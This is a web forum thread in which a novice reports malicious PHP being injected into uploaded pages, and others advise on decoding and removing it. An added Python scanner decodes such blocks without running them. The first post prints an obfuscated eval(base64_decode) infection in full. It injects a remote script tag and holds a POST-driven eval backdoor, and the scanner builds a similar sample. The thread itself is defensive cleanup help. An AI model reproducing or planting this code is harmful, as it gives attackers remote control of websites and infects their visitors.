Hi experts, I need your advice on this issue as my webpages are reacting strange. Some code automatically get added on uploading the files on server. <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndXEyJykpe2Z1bmN0aW9uIHVxMigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzWmhjMkZwYTJGeUxtOXlaeTl0WVcxaWIzUnpMM05sWVhKamFDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdXEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJHVxMjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHVxMjEpKWNhbGxfdXNlcl9mdW5jKCR1cTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1cTInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd1cTInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdXEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndXEyMicpKSE9J3VxMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb
J2UnXSkpOw==')); ?> Please help me, as I have no idea about this. I am new to PHP...
When I decoded it, it seems it's got some iframe code. Seems like some hacker has added that code. You need to remove it manually and change the password.
On decoding, it results in <script src=http://vasaikar.org/mambots/search.php ></script> which gives a 404. Do you think changing the password will be enough, and which passwords (FTP/database) are to be changed?
Not just changing; in fact, you shouldn't save passwords in FTP software (if you saved them). More info @ How To Completely Remove All Malicious Iframes on Your Website
http://google.com/safebrowsing/diagnostic?site=AS:13332 Has this network hosted sites that have distributed malware? Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 3 site(s), including, for example, vasaikar.org/, kk6.us/, stat-google.com/, that infected 158 other site(s), including, for example, nter-hkscout.org/, backshop.co.kr/, algeria.or.kr/.
Go to Google and enter this search, replacing the capitalized text with your domain name and removing all the spaces: site: WWW . EXAMPLE . COM If a result says "This site may harm your computer", click a link to one of your site pages and follow the link to the Safe Browsing Diagnostic report.
Check all your other .php files; you may find that many or all have had this code added. Next, check all installed software for updates, especially galleries. Next, find which file on the server introduced this code to the current file; there will probably be 1 root file for this virus.
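One way to run the check suggested in the post above over a whole site tree, as an added example that is not part of the thread: it finds `eval(base64_decode('...'))` blocks, decodes them without executing anything (including nested base64 literals such as the script tag decoded earlier in the thread), and tags what the payload contains. The indicator names, the sample file and the `malware.example` host are constructed for this example.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) with a literal blob; whitespace inside the blob is tolerated.
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
INDICATORS = {  # names and patterns are this example's own choices
    "remote_script": re.compile(rb"<script[^>]+src\s*=", re.I),
    "request_eval": re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)", re.I),
    "output_hook": re.compile(rb"\b(ob_start|set_error_handler)\s*\(", re.I),
}

def decode_layers(blob, depth=3):
    """Decode (never execute) a blob plus any base64 literals nested inside it."""
    try:
        out = base64.b64decode(b"".join(blob.split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return b""
    if depth > 1:
        for m in re.finditer(rb"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", out):
            out += b"\n" + decode_layers(m.group(1), depth - 1)
    return out

def scan_file(path):
    """Return one finding per injected block: byte offset plus matched indicators."""
    findings = []
    for m in INJECT_RE.finditer(Path(path).read_bytes()):
        decoded = decode_layers(m.group(2))
        tags = sorted(k for k, rx in INDICATORS.items() if rx.search(decoded))
        findings.append({"offset": m.start(), "indicators": tags})
    return findings

def scan_tree(root):
    return {str(p.relative_to(root)): f for p in sorted(Path(root).rglob("*.php")) if (f := scan_file(p))}

def demo():
    # Constructed sample shaped like the injection in the thread; malware.example is a placeholder.
    inner = base64.b64encode(b"<script src=http://malware.example/x.php ></script>")
    body = b"ob_start('h');$a=base64_decode('" + inner + b"');eval(base64_decode($_POST['e']));"
    bad = b"<?php eval(base64_decode('" + base64.b64encode(body) + b"')); ?>\n<?php echo 'hi'; ?>"
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "index.php").write_bytes(bad)
        (Path(d) / "clean.php").write_bytes(b"<?php echo base64_decode('aGk='); ?>")
        return scan_tree(d)

if __name__ == "__main__":
    print(demo())
```

Run `scan_tree()` against a downloaded copy of the site rather than the live server, and treat any file it reports as needing a restore from a known-good copy.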
Someone probably got your FTP info; it happened to me a few months back. Basically you get a virus on your PC, then that transmits your FTP data, and that data is used to insert the code. Change all passwords, scan your PC and don't store passwords in the FTP program. Also, you might have a security issue with your script, so update it or make sure it's secure.
I don't think it's the password problem. I translated those hack codes and found a simple way to fix it: site-get-hacked-with-evalbase64_decode
Were you using a theme or any other script with encoded promo footer links, or anything like that? I've seen more than one occasion where someone's site was hacked because of the eval(base64 link code in the theme. This is why I always recommend not using them ever. Even if the theme creator doesn't do it, if their site gets hacked, yours does too.